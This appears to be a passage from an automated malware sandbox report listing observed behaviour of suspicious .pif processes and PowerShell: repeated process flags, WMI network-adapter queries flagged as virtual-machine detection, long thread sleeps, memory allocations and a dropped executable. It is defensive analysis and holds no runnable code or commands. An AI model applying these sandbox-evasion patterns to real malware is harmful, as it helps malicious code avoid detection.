                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifMemory allocated: 3D940000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifMemory allocated: 3DDE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifMemory allocated: 3DD00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifMemory allocated: 25B80000 memory reserve | memory write watch
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifMemory allocated: 25F70000 memory reserve | memory write watch
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifMemory allocated: 27F70000 memory reserve | memory write watch
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifMemory allocated: 3D900000 memory reserve | memory write watch
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifMemory allocated: 3DD30000 memory reserve | memory write watch
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifMemory allocated: 3FD30000 memory reserve | memory write watch
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,23_2_004019F0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAABA20F6D sldt word ptr [eax]17_2_00007FFAABA20F6D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1200000Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199809Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199687Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199305Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199172Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197547Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197435Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197328Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197219Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197109Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197000Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196880Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196766Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196652Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196544Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196403Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196229Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196124Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196012Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1195854Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1195728Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1195608Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1195470Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1195295Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1195143Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1194979Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1194835Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1194719Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1200000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199865
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199744
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199618
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199448
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199323
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199199
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199043
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198916
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198764
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198627
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198467
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198331
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1200000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199829
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199704
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199590
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199469
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199359
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199250
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199110
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198888
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198781
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198657
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198532
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198422
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198297
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198185
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198078
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197954
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197836
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197730
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197586
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197471
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197344
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197235
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197094
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196985
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196875
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3319Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2828Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5125Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4640Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4699Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5088Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWindow / User API: threadDelayed 4680Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWindow / User API: threadDelayed 5110Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWindow / User API: threadDelayed 2876
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWindow / User API: threadDelayed 3306
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWindow / User API: threadDelayed 3310
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWindow / User API: threadDelayed 6521
                    Source: C:\Users\user\AppData\Roaming\uc.exeDropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFAPI coverage: 8.9 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1836Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3812Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 7636Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep count: 4699 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep count: 5088 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 6480Thread sleep count: 4680 > 30Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -99872s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 6480Thread sleep count: 5110 > 30Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -99749s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -99640s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -99530s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -99417s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -99297s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -99181s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -99071s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -98959s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -98843s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -98734s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -98624s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -98515s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -98399s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -98296s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -98176s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -98062s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -97945s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -97825s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -97718s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -97609s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -97499s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -97390s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -97281s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -97169s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -97062s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -96953s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -96843s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -96734s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -96624s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -96515s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1200000s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1199809s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1199687s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1199305s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1199172s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1197547s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1197435s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1197328s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1197219s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1197109s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1197000s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1196880s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1196766s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1196652s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1196544s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1196403s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1196229s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1196124s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1196012s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1195854s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1195728s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1195608s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1195470s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1195295s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1195143s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1194979s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1194835s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908Thread sleep time: -1194719s >= -30000sJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -19369081277395017s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 1928Thread sleep count: 2876 > 30
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -99879s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 1928Thread sleep count: 3306 > 30
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -99765s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -99655s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -99546s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -99435s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -99325s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -99209s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -99078s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98936s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98822s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98718s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98606s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98484s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98374s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98264s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98156s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98046s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -97936s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -97797s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -97685s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -97564s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -97424s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -97292s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -97180s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1200000s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1199865s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1199744s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1199618s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1199448s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1199323s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1199199s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1199043s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1198916s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1198764s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1198627s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1198467s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1198331s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep count: 32 > 30
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -29514790517935264s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -100000s >= -30000s
